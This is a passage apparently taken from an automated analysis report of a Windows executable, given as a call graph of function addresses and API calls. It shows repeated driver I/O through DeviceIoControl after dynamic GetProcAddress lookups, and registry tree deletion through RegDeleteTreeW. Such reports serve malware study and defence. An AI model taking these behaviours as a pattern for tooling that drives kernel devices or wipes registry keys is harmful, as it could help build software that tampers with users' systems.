API calls 6719->6721 6723 7ff7738ede48 6721->6723 6725 7ff7738e7b00 22 API calls 6723->6725 6724 7ff7738ede97 6728 7ff7738ea3c0 9 API calls 6724->6728 6727 7ff7738ede68 6725->6727 6726 7ff7738edf00 6729 7ff7738edfe2 6726->6729 6734 7ff7738e7c70 21 API calls 6726->6734 6730 7ff7738ede74 6727->6730 6732 7ff7738e6d90 9 API calls 6727->6732 6731 7ff7738edeaa ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6728->6731 6992 7ff7738eb060 6729->6992 6735 7ff7738ea3c0 9 API calls 6730->6735 6731->5660 6736 7ff7738eded9 6732->6736 6738 7ff7738edf2e 6734->6738 6739 7ff7738ede87 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6735->6739 6736->6718 6736->6730 6737 7ff7738edf7d 6741 7ff7738ea3c0 9 API calls 6737->6741 6742 7ff7738ee007 6737->6742 6740 7ff7738e7b00 22 API calls 6738->6740 6739->6724 6743 7ff7738edf4e 6740->6743 6744 7ff7738edf90 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6741->6744 6742->5660 6745 7ff7738edf5a 6743->6745 6747 7ff7738e6d90 9 API calls 6743->6747 6746 7ff7738e5fe0 34 API calls 6744->6746 6748 7ff7738ea3c0 9 API calls 6745->6748 6749 7ff7738edfab 6746->6749 6750 7ff7738edfd2 6747->6750 6751 7ff7738edf6d ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6748->6751 6749->5660 6750->6729 6750->6745 6751->6737 6754 7ff7738ebd5f 6753->6754 6768 7ff7738ebd99 6753->6768 6755 7ff7738ebd64 GetModuleHandleA 6754->6755 6754->6768 6756 7ff7738ebd76 6755->6756 6757 7ff7738ebdc3 GetProcAddress 6755->6757 6762 7ff7738ea3c0 9 API calls 6756->6762 6757->6756 6759 7ff7738ebde4 6757->6759 6758 7ff7738f3fc0 8 API calls 6760 7ff7738ebda7 6758->6760 6761 7ff7738ebe00 DeviceIoControl 6759->6761 6764 7ff7738ebe78 6759->6764 6760->5660 6761->6759 6761->6768 6763 7ff7738ebd89 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6762->6763 6763->6768 6765 7ff7738e5ef0 9 API calls 6764->6765 6766 7ff7738ebe8e 6765->6766 6767 7ff7738ebec0 DeviceIoControl 6766->6767 6766->6768 6767->6766 6767->6768 6768->6758 6770 7ff7738ef399 6769->6770 6773 7ff7738ef36f 6769->6773 6771 7ff7738f3fc0 8 API calls 6770->6771 6772 7ff7738ee35b 6771->6772 6775 7ff7738ee650 6772->6775 6773->6770 7008 7ff7738ef9d0 6773->7008 6776 7ff7738ee665 6775->6776 6777 7ff7738ee746 _invalid_parameter_noinfo_noreturn 6776->6777 6778 7ff7738ee71e 6776->6778 6780 7ff7738ee366 6776->6780 6779 7ff7738f3fe0 free 6778->6779 6779->6780 6781 7ff7738ee750 6780->6781 6782 7ff7738ee762 6781->6782 6783 7ff7738ee897 6781->6783 6782->6783 6784 7ff7738ee780 6782->6784 6785 7ff7738ee7aa 6782->6785 6783->5683 6788 7ff7738ea3c0 9 API calls 6784->6788 6786 7ff7738ee7b9 6785->6786 6787 7ff7738ee7e8 6785->6787 6789 7ff7738ea3c0 9 API calls 6786->6789 6790 7ff7738ee836 6787->6790 6791 7ff7738ee809 6787->6791 6792 7ff7738ee793 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6788->6792 6793 7ff7738ee7cc ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6789->6793 6795 7ff7738ea3c0 9 API calls 6790->6795 6794 7ff7738ea3c0 9 API calls 6791->6794 6792->5683 6793->5683 6796 7ff7738ee815 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6794->6796 6797 7ff7738ee847 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z GetCurrentThreadId GetCurrentProcessId 6795->6797 6796->5683 6797->5683 6809 7ff7738ef4c5 6798->6809 6813 7ff7738ef72f 6798->6813 6799 7ff7738f3fc0 8 API calls 6800 7ff7738ee391 6799->6800 6815 7ff7738ee8a0 6800->6815 6801 7ff7738ec9f0 7 API calls 6801->6809 6802 7ff7738ef749 _invalid_parameter_noinfo_noreturn 6804 7ff7738ef750 _invalid_parameter_noinfo_noreturn 6802->6804 6803 7ff7738e9af0 22 API calls 6803->6809 6806 7ff7738ef757 _invalid_parameter_noinfo_noreturn 6804->6806 6806->6813 6809->6801 6809->6802 6809->6803 6809->6804 6809->6806 6810 7ff7738ef5fa memmove 6809->6810 6809->6813 6814 7ff7738f3fe0 free 6809->6814 7029 7ff7738ecd60 6809->7029 7047 7ff7738efbf0 6809->7047 7071 7ff7738f0050 6809->7071 7097 7ff7738ef7a0 6809->7097 7123 7ff7738ef1c0 6809->7123 6810->6809 6813->6799 6814->6809 6816 7ff7738ee94d 6815->6816 6820 7ff7738ee8db 6815->6820 6817 7ff7738ef0b0 20 API calls 6816->6817 6829 7ff7738ee9b4 6816->6829 6819 7ff7738ee95e 6817->6819 6818 7ff7738f32c0 25 API calls 6818->6820 6822 7ff7738ee9a9 6819->6822 6825 7ff7738eeb2f _invalid_parameter_noinfo_noreturn 6819->6825 6820->6816 6820->6818 6823 7ff7738eea6c 6820->6823 6833 7ff7738e6440 27 API calls 6820->6833 6836 7ff7738ee9e9 6820->6836 6821 7ff7738f3fc0 8 API calls 6824 7ff7738ee399 6821->6824 6826 7ff7738f3fe0 free 6822->6826 6827 7ff7738eeea0 9 API calls 6823->6827 6824->5688 6824->5691 6826->6829 6828 7ff7738eea7f 6827->6828 6830 7ff7738ed3d0 9 API calls 6828->6830 6829->6821 6831 7ff7738eea98 6830->6831 6832 7ff7738eeea0 9 API calls 6831->6832 6834 7ff7738eeaa7 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6832->6834 6833->6820 6834->6829 6835 7ff7738eeac0 6834->6835 6837 7ff7738ef0b0 20 API calls 6835->6837 7161 7ff7738eeea0 6836->7161 6839 7ff7738eeac9 6837->6839 6839->6825 6841 7ff7738eeb10 6839->6841 6843 7ff7738f3fe0 free 6841->6843 6843->6829 6845 7ff7738eeea0 9 API calls 6846 7ff7738eea24 6845->6846 6847 7ff7738ed3d0 9 API calls 6846->6847 6848 7ff7738eea3d 6847->6848 6849 7ff7738eeea0 9 API calls 6848->6849 6850 7ff7738eea4c ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6849->6850 7189 7ff7738eeb40 6850->7189 6853 7ff7738ea7c0 29 API calls 6852->6853 6854 7ff7738f14a7 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6853->6854 6854->5700 6856 7ff7738eecc9 6855->6856 6870 7ff7738eed03 6855->6870 6857 7ff7738eecce GetModuleHandleA 6856->6857 6856->6870 6858 7ff7738eed2c GetProcAddress 6857->6858 6861 7ff7738eece0 6857->6861 6858->6861 6862 7ff7738eed4d 6858->6862 6859 7ff7738f3fc0 8 API calls 6860 7ff7738ee447 6859->6860 6860->5691 6860->5710 6864 7ff7738ea3c0 9 API calls 6861->6864 6863 7ff7738eed70 DeviceIoControl 6862->6863 6866 7ff7738eede8 6862->6866 6863->6862 6863->6870 6865 7ff7738eecf3 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6864->6865 6865->6870 6867 7ff7738e5ef0 9 API calls 6866->6867 6869 7ff7738eedfe 6867->6869 6868 7ff7738eee24 DeviceIoControl 6868->6869 6868->6870 6869->6868 6869->6870 6870->6859 6872 7ff7738e6100 6871->6872 6873 7ff7738e61a7 6871->6873 6874 7ff7738f4090 3 API calls 6872->6874 6875 7ff7738e61e1 6873->6875 6876 7ff7738e61b1 6873->6876 6877 7ff7738e610c 6874->6877 7203 7ff7738eb8f0 6875->7203 6878 7ff7738ea3c0 9 API calls 6876->6878 6877->6873 6882 7ff7738ec9f0 7 API calls 6877->6882 6880 7ff7738e61c4 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6878->6880 6880->5705 6881 7ff7738e61f3 6881->5705 6883 7ff7738e6141 6882->6883 6884 7ff7738e6440 27 API calls 6883->6884 6885 7ff7738e6153 6884->6885 6886 7ff7738e6195 6885->6886 6888 7ff7738e618e _invalid_parameter_noinfo_noreturn 6885->6888 6890 7ff7738e619a 6885->6890 6889 7ff7738f3fe0 free 6886->6889 6888->6886 6889->6890 7202 7ff7738f4024 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 6890->7202 6892 7ff7738e62d0 6891->6892 6893 7ff7738e6229 6891->6893 6894 7ff7738e6305 6892->6894 6895 7ff7738e62da 6892->6895 6896 7ff7738f4090 3 API calls 6893->6896 7220 7ff7738ebb10 6894->7220 6897 7ff7738ea3c0 9 API calls 6895->6897 6898 7ff7738e6235 6896->6898 6900 7ff7738e62ed ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6897->6900 6898->6892 6902 7ff7738ec9f0 7 API calls 6898->6902 6900->5711 6903 7ff7738e626a 6902->6903 6904 7ff7738e6440 27 API calls 6903->6904 6905 7ff7738e627c 6904->6905 6906 7ff7738e62c3 6905->6906 6907 7ff7738e62be 6905->6907 6909 7ff7738e62b7 _invalid_parameter_noinfo_noreturn 6905->6909 7219 7ff7738f4024 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 6906->7219 6910 7ff7738f3fe0 free 6907->6910 6909->6907 6910->6906 6912 7ff7738e6003 6911->6912 6913 7ff7738e60a5 6911->6913 6915 7ff7738e7c70 21 API calls 6912->6915 7236 7ff7738eae50 6913->7236 6917 7ff7738e6023 6915->6917 6918 7ff7738e7b00 22 API calls 6917->6918 6919 7ff7738e6043 6918->6919 6920 7ff7738e604f 6919->6920 6922 7ff7738e6d90 9 API calls 6919->6922 6921 7ff7738ea3c0 9 API calls 6920->6921 6924 7ff7738e6062 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6921->6924 6923 7ff7738e6099 6922->6923 6923->6913 6923->6920 6924->5708 6927 7ff7738eb2c0 6926->6927 6928 7ff7738eb2fa 6926->6928 6927->6928 6929 7ff7738eb2c5 GetModuleHandleA 6927->6929 6930 7ff7738f3fc0 8 API calls 6928->6930 6931 7ff7738eb323 GetProcAddress 6929->6931 6932 7ff7738eb2d7 6929->6932 6933 7ff7738eb308 6930->6933 6931->6932 6934 7ff7738eb344 6931->6934 6935 7ff7738ea3c0 9 API calls 6932->6935 6933->6659 6936 7ff7738eb360 DeviceIoControl 6934->6936 6938 7ff7738eb3d8 6934->6938 6937 7ff7738eb2ea ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6935->6937 6936->6928 6936->6934 6937->6928 6939 7ff7738e5ef0 9 API calls 6938->6939 6940 7ff7738eb3ee 6939->6940 6940->6928 6941 7ff7738eb420 DeviceIoControl 6940->6941 6941->6928 6941->6940 6944 7ff7738eb4e0 6943->6944 6945 7ff7738eb51a 6943->6945 6944->6945 6946 7ff7738eb4e5 GetModuleHandleA 6944->6946 6947 7ff7738f3fc0 8 API calls 6945->6947 6948 7ff7738eb543 GetProcAddress 6946->6948 6949 7ff7738eb4f7 6946->6949 6950 7ff7738eb528 6947->6950 6948->6949 6951 7ff7738eb564 6948->6951 6953 7ff7738ea3c0 9 API calls 6949->6953 6950->6674 6952 7ff7738eb580 DeviceIoControl 6951->6952 6955 7ff7738eb5f8 6951->6955 6952->6945 6952->6951 6954 7ff7738eb50a ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6953->6954 6954->6945 6956 7ff7738e5ef0 9 API calls 6955->6956 6957 7ff7738eb60e 6956->6957 6957->6945 6958 7ff7738eb650 DeviceIoControl 6957->6958 6958->6945 6958->6957 6961 7ff7738eb710 6960->6961 6975 7ff7738eb74a 6960->6975 6962 7ff7738eb715 GetModuleHandleA 6961->6962 6961->6975 6963 7ff7738eb773 GetProcAddress 6962->6963 6964 7ff7738eb727 6962->6964 6963->6964 6966 7ff7738eb794 6963->6966 6969 7ff7738ea3c0 9 API calls 6964->6969 6965 7ff7738f3fc0 8 API calls 6967 7ff7738eb758 6965->6967 6968 7ff7738eb7b0 DeviceIoControl 6966->6968 6971 7ff7738eb828 6966->6971 6967->6712 6968->6966 6968->6975 6970 7ff7738eb73a ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6969->6970 6970->6975 6972 7ff7738e5ef0 9 API calls 6971->6972 6974 7ff7738eb83e 6972->6974 6973 7ff7738eb870 DeviceIoControl 6973->6974 6973->6975 6974->6973 6974->6975 6975->6965 6977 7ff7738eac70 6976->6977 6991 7ff7738eacaa 6976->6991 6978 7ff7738eac75 GetModuleHandleA 6977->6978 6977->6991 6979 7ff7738eacd3 GetProcAddress 6978->6979 6983 7ff7738eac87 6978->6983 6982 7ff7738eacf4 6979->6982 6979->6983 6980 7ff7738f3fc0 8 API calls 6981 7ff7738eacb8 6980->6981 6981->6724 6981->6726 6984 7ff7738ead10 DeviceIoControl 6982->6984 6987 7ff7738ead88 6982->6987 6985 7ff7738ea3c0 9 API calls 6983->6985 6984->6982 6984->6991 6986 7ff7738eac9a ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6985->6986 6986->6991 6988 7ff7738e5ef0 9 API calls 6987->6988 6990 7ff7738ead9e 6988->6990 6989 7ff7738eadd0 DeviceIoControl 6989->6990 6989->6991 6990->6989 6990->6991 6991->6980 6993 7ff7738eb0a0 6992->6993 7007 7ff7738eb0da 6992->7007 6994 7ff7738eb0a5 GetModuleHandleA 6993->6994 6993->7007 6996 7ff7738eb103 GetProcAddress 6994->6996 6997 7ff7738eb0b7 6994->6997 6995 7ff7738f3fc0 8 API calls 6998 7ff7738eb0e8 6995->6998 6996->6997 7002 7ff7738eb124 6996->7002 6999 7ff7738ea3c0 9 API calls 6997->6999 6998->6737 7001 7ff7738eb0ca ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6999->7001 7000 7ff7738eb140 DeviceIoControl 7000->7002 7000->7007 7001->7007 7002->7000 7003 7ff7738eb1b8 7002->7003 7004 7ff7738e5ef0 9 API calls 7003->7004 7006 7ff7738eb1ce 7004->7006 7005 7ff7738eb200 DeviceIoControl 7005->7006 7005->7007 7006->7005 7006->7007 7007->6995 7009 7ff7738efbd5 7008->7009 7010 7ff7738efa3a 7008->7010 7028 7ff7738ed3b0 ?_Xlength_error@std@@YAXPEBD 7009->7028 7012 7ff7738efbda 7010->7012 7015 7ff7738efaae 7010->7015 7016 7ff7738efad7 7010->7016 7013 7ff7738e1190 Concurrency::cancel_current_task __std_exception_copy 7012->7013 7014 7ff7738efbe0 7013->7014 7015->7012 7019 7ff7738f4108 std::_Facet_Register 3 API calls 7015->7019 7017 7ff7738efac0 7016->7017 7018 7ff7738f4108 std::_Facet_Register 3 API calls 7016->7018 7020 7ff7738efb16 7017->7020 7021 7ff7738efb1b memmove 7017->7021 7023 7ff7738efbce _invalid_parameter_noinfo_noreturn 7017->7023 7018->7017 7019->7017 7022 7ff7738efb34 memmove 7020->7022 7021->7022 7024 7ff7738efb94 7022->7024 7025 7ff7738efb41 7022->7025 7023->7009 7024->6773 7025->7023 7026 7ff7738efb89 7025->7026 7027 7ff7738f3fe0 free 7026->7027 7027->7024 7030 7ff7738ece86 7029->7030 7031 7ff7738ecd87 7029->7031 7131 7ff7738e1230 ?_Xlength_error@std@@YAXPEBD 7030->7131 7033 7ff7738ecdc9 7031->7033 7036 7ff7738ece02 7031->7036 7034 7ff7738f4108 std::_Facet_Register 3 API calls 7033->7034 7035 7ff7738ece8b 7033->7035 7038 7ff7738ecdeb 7034->7038 7037 7ff7738e1190 Concurrency::cancel_current_task __std_exception_copy 7035->7037 7036->7038 7041 7ff7738f4108 std::_Facet_Register 3 API calls 7036->7041 7040 7ff7738ece91 7037->7040 7039 7ff7738ece7f _invalid_parameter_noinfo_noreturn 7038->7039 7042 7ff7738ece16 memmove 7038->7042 7039->7030 7041->7038 7043 7ff7738ece64 7042->7043 7044 7ff7738ece37 7042->7044 7043->6809 7044->7039 7045 7ff7738ece5c 7044->7045 7046 7ff7738f3fe0 free 7045->7046 7046->7043 7048 7ff7738efc63 7047->7048 7049 7ff7738eff98 7047->7049 7050 7ff7738eff93 7048->7050 7054 7ff7738efd03 7048->7054 7055 7ff7738efccd 7048->7055 7142 7ff7738ed3b0 ?_Xlength_error@std@@YAXPEBD 7049->7142 7052 7ff7738e1190 Concurrency::cancel_current_task __std_exception_copy 7050->7052 7052->7049 7057 7ff7738f4108 std::_Facet_Register 3 API calls 7054->7057 7058 7ff7738efce0 7054->7058 7055->7050 7056 7ff7738f4108 std::_Facet_Register 3 API calls 7055->7056 7056->7058 7057->7058 7059 7ff7738eff8c _invalid_parameter_noinfo_noreturn 7058->7059 7060 7ff7738e9af0 22 API calls 7058->7060 7059->7050 7061 7ff7738efd64 7060->7061 7061->7061 7063 7ff7738efd87 7061->7063 7132 7ff7738ef2a0 7061->7132 7064 7ff7738ef2a0 17 API calls 7063->7064 7065 7ff7738efef3 7064->7065 7066 7ff7738eff5b 7065->7066 7067 7ff7738ef2a0 17 API calls 7065->7067 7066->6809 7068 7ff7738eff05 7067->7068 7068->7059 7069 7ff7738eff50 7068->7069 7070 7ff7738f3fe0 free 7069->7070 7070->7066 7072 7ff7738f0180 7071->7072 7073 7ff7738f00ac 7071->7073 7075 7ff7738f3fc0 8 API calls 7072->7075 7074 7ff7738f01ae 7073->7074 7077 7ff7738f0100 7073->7077 7081 7ff7738f00e1 7073->7081 7082 7ff7738f01a9 7073->7082 7143 7ff7738ed3b0 ?_Xlength_error@std@@YAXPEBD 7074->7143 7078 7ff7738f0194 7075->7078 7079 7ff7738f00eb 7077->7079 7083 7ff7738f4108 std::_Facet_Register 3 API calls 7077->7083 7078->6809 7084 7ff7738f0175 7079->7084 7089 7ff7738e9af0 22 API calls 7079->7089 7085 7ff7738f4108 std::_Facet_Register 3 API calls 7081->7085 7086 7ff7738e1190 Concurrency::cancel_current_task __std_exception_copy 7082->7086 7083->7079 7087 7ff7738ef2a0 17 API calls 7084->7087 7088 7ff7738f00e6 7085->7088 7086->7074 7087->7072 7088->7079 7090 7ff7738f00f9 _invalid_parameter_noinfo_noreturn 7088->7090 7089->7079 7090->7077 7098 7ff7738ef9c0 7097->7098 7099 7ff7738ef810 7097->7099 7160 7ff7738ed3b0 ?_Xlength_error@std@@YAXPEBD 7098->7160 7101 7ff7738ef9bb 7099->7101 7104 7ff7738ef86d 7099->7104 7105 7ff7738ef89b 7099->7105 7103 7ff7738e1190 Concurrency::cancel_current_task __std_exception_copy 7101->7103 7103->7098 7104->7101 7106 7ff7738f4108 std::_Facet_Register 3 API calls 7104->7106 7107 7ff7738f4108 std::_Facet_Register 3 API calls 7105->7107 7108 7ff7738ef87f 7105->7108 7106->7108 7107->7108 7109 7ff7738ef9b4 _invalid_parameter_noinfo_noreturn 7108->7109 7110 7ff7738e9af0 22 API calls 7108->7110 7109->7101 7111 7ff7738ef8e3 7110->7111 7112 7ff7738f0050 29 API calls 7111->7112 7113 7ff7738ef8f6 7112->7113 7114 7ff7738ef913 7113->7114 7144 7ff7738effa0 7113->7144 7116 7ff7738effa0 20 API calls 7114->7116 7117 7ff7738ef927 7116->7117 7118 7ff7738ef98b 7117->7118 7148 7ff7738ef0b0 7117->7148 7118->6809 7120 7ff7738ef939 7120->7109 7121 7ff7738ef980 7120->7121 7122 7ff7738f3fe0 free 7121->7122 7122->7118 7124 7ff7738ef1d1 7123->7124 7125 7ff7738ef22d 7123->7125 7126 7ff7738ef2a0 17 API calls 7124->7126 7125->6809 7127 7ff7738ef1da 7126->7127 7128 7ff7738ef225 7127->7128 7129 7ff7738ef240 _invalid_parameter_noinfo_noreturn 7127->7129 7130 7ff7738f3fe0 free 7128->7130 7130->7125 7133 7ff7738ef30e 7132->7133 7135 7ff7738ef2a5 7132->7135 7133->7063 7134 7ff7738ef31e _invalid_parameter_noinfo_noreturn 7140 7ff7738ef330 7134->7140 7135->7133 7135->7134 7136 7ff7738f3fe0 free 7135->7136 7136->7135 7137 7ff7738ef399 7138 7ff7738f3fc0 8 API calls 7137->7138 7139 7ff7738ef45d 7138->7139 7139->7063 7140->7137 7141 7ff7738ef9d0 8 API calls 7140->7141 7141->7140 7145 7ff7738effb1 7144->7145 7146 7ff7738ef0b0 20 API calls 7145->7146 7147 7ff7738f0034 7146->7147 7147->7114 7150 7ff7738ef0b9 7148->7150 7151 7ff7738ef131 7148->7151 7149 7ff7738ef1c0 18 API calls 7149->7150 7150->7149 7150->7151 7152 7ff7738ef146 _invalid_parameter_noinfo_noreturn 7150->7152 7153 7ff7738f3fe0 free 7150->7153 7151->7120 7154 7ff7738ef1c0 18 API calls 7152->7154 7153->7150 7155 7ff7738ef162 7154->7155 7156 7ff7738ef198 7155->7156 7157 7ff7738ef190 7155->7157 7158 7ff7738ef1b1 _invalid_parameter_noinfo_noreturn 7155->7158 7156->7120 7159 7ff7738f3fe0 free 7157->7159 7159->7156 7164 7ff7738eeed0 ?good@ios_base@std@ 7161->7164 7163 7ff7738eef23 7166 7ff7738eef39 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 7163->7166 7168 7ff7738eef51 7163->7168 7164->7163 7164->7168 7165 7ff7738eefab ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 7169 7ff7738eef5b ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 7165->7169 7170 7ff7738eefc8 7165->7170 7166->7168 7168->7165 7168->7169 7173 7ff7738eef85 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 7168->7173 7171 7ff7738ef035 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 7169->7171 7172 7ff7738ee9fc 7169->7172 7170->7169 7174 7ff7738eefcd ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 7170->7174 7171->7172 7175 7ff7738ed3d0 7172->7175 7173->7168 7173->7169 7174->7169 7174->7170 7176 7ff7738ed406 ?good@ios_base@std@ 7175->7176 7178 7ff7738ed43f 7176->7178 7187 7ff7738ed46d 7176->7187 7179 7ff7738ed455 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 7178->7179 7178->7187 7179->7187 7181 7ff7738ed4c7 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 7185 7ff7738ed4b7 7181->7185 7186 7ff7738ed477 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 7181->7186 7182 7ff7738ed551 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 7183 7ff7738ed55b 7182->7183 7183->6845 7184 7ff7738ed49b ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 7184->7185 7184->7187 7185->7186 7188 7ff7738ed4e9 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 7185->7188 7186->7182 7186->7183 7187->7181 7187->7184 7187->7186 7188->7185 7188->7186 7190 7ff7738eeb51 7189->7190 7196 7ff7738eeba9 7189->7196 7191 7ff7738ef0b0 20 API calls 7190->7191 7192 7ff7738eeb5a 7191->7192 7193 7ff7738eeba1 7192->7193 7194 7ff7738eebbc _invalid_parameter_noinfo_noreturn 7192->7194 7195 7ff7738f3fe0 free 7193->7195 7197 7ff7738eebe1 7194->7197 7198 7ff7738eec31 7194->7198 7195->7196 7196->6829 7199 7ff7738eec29 7197->7199 7200 7ff7738eec44 _invalid_parameter_noinfo_noreturn 7197->7200 7198->6829 7201 7ff7738f3fe0 free 7199->7201 7201->7198 7204 7ff7738eb934 7203->7204 7205 7ff7738eb96e 7203->7205 7204->7205 7206 7ff7738eb939 GetModuleHandleA 7204->7206 7207 7ff7738f3fc0 8 API calls 7205->7207 7208 7ff7738eb94b 7206->7208 7209 7ff7738eb997 GetProcAddress 7206->7209 7210 7ff7738eb97c 7207->7210 7212 7ff7738ea3c0 9 API calls 7208->7212 7209->7208 7211 7ff7738eb9b8 7209->7211 7210->6881 7213 7ff7738eb9d0 DeviceIoControl 7211->7213 7215 7ff7738eba4c 7211->7215 7214 7ff7738eb95e ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 7212->7214 7213->7205 7213->7211 7214->7205 7216 7ff7738e5ef0 9 API calls 7215->7216 7217 7ff7738eba60 7216->7217 7217->6881 7217->7205 7218 7ff7738ebab8 DeviceIoControl 7217->7218 7218->7205 7218->7217 7221 7ff7738ebb50 7220->7221 7235 7ff7738ebb8a 7220->7235 7222 7ff7738ebb55 GetModuleHandleA 7221->7222 7221->7235 7223 7ff7738ebbb3 GetProcAddress 7222->7223 7224 7ff7738ebb67 7222->7224 7223->7224 7229 7ff7738ebbd4 7223->7229 7228 7ff7738ea3c0 9 API calls 7224->7228 7225 7ff7738f3fc0 8 API calls 7226 7ff7738e6312 7225->7226 7226->5711 7227 7ff7738ebbf0 DeviceIoControl 7227->7229 7227->7235 7230 7ff7738ebb7a ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 7228->7230 7229->7227 7231 7ff7738ebc68 7229->7231 7230->7235 7232 7ff7738e5ef0 9 API calls 7231->7232 7234 7ff7738ebc7e 7232->7234 7233 7ff7738ebca0 DeviceIoControl 7233->7234 7233->7235 7234->7233 7234->7235 7235->7225 7237 7ff7738eae90 7236->7237 7251 7ff7738eaeca 7236->7251 7238 7ff7738eae95 GetModuleHandleA 7237->7238 7237->7251 7240 7ff7738eaef3 GetProcAddress 7238->7240 7241 7ff7738eaea7 7238->7241 7239 7ff7738f3fc0 8 API calls 7242 7ff7738e60bf 7239->7242 7240->7241 7243 7ff7738eaf14 7240->7243 7244 7ff7738ea3c0 9 API calls 7241->7244 7242->5708 7245 7ff7738eaf30 DeviceIoControl 7243->7245 7247 7ff7738eafa8 7243->7247 7246 7ff7738eaeba ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 7244->7246 7245->7243 7245->7251 7246->7251 7248 7ff7738e5ef0 9 API calls 7247->7248 7250 7ff7738eafbe 7248->7250 7249 7ff7738eafe3 DeviceIoControl 7249->7250 7249->7251 7250->7249 7250->7251 7251->7239 7253 7ff7738f303e 7252->7253 7254 7ff7738f2e07 7252->7254 7256 7ff7738f3fc0 8 API calls 7253->7256 7255 7ff7738f306a 7254->7255 7259 7ff7738ed270 6 API calls 7254->7259 7284 7ff7738e1230 ?_Xlength_error@std@@YAXPEBD 7255->7284 7257 7ff7738e5b1a 7256->7257 7257->5739 7257->5741 7257->5743 7261 7ff7738f2e55 RtlInitUnicodeString 7259->7261 7262 7ff7738f3065 7261->7262 7263 7ff7738f2e7f 7261->7263 7283 7ff7738e1230 ?_Xlength_error@std@@YAXPEBD 7262->7283 7265 7ff7738ed270 6 API calls 7263->7265 7266 7ff7738f2eac RegOpenKeyW 7265->7266 7267 7ff7738f2edb RegCloseKey GetProcAddress 7266->7267 7272 7ff7738f2ed0 7266->7272 7268 7ff7738f2efb 7267->7268 7270 7ff7738ea7c0 29 API calls 7268->7270 7269 7ff7738f2fe9 7269->7253 7273 7ff7738f3039 7269->7273 7277 7ff7738f3032 _invalid_parameter_noinfo_noreturn 7269->7277 7274 7ff7738f2f10 ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@J ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 7270->7274 7271 7ff7738f2fe4 7276 7ff7738f3fe0 free 7271->7276 7272->7269 7272->7271 7275 7ff7738f2fdd _invalid_parameter_noinfo_noreturn 7272->7275 7280 7ff7738f3fe0 free 7273->7280 7278 7ff7738f2f81 RegDeleteTreeW 7274->7278 7279 7ff7738f2f3f 7274->7279 7275->7271 7276->7269 7277->7273 7278->7272 7281 7ff7738ea7c0 29 API calls 7279->7281 7280->7253 7282 7ff7738f2f52 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z RegDeleteTreeW 7281->7282 7282->7272 7286 7ff7738e9ad0 7285->7286 7286->7286 7287 7ff7738ec9f0 7 API calls 7286->7287 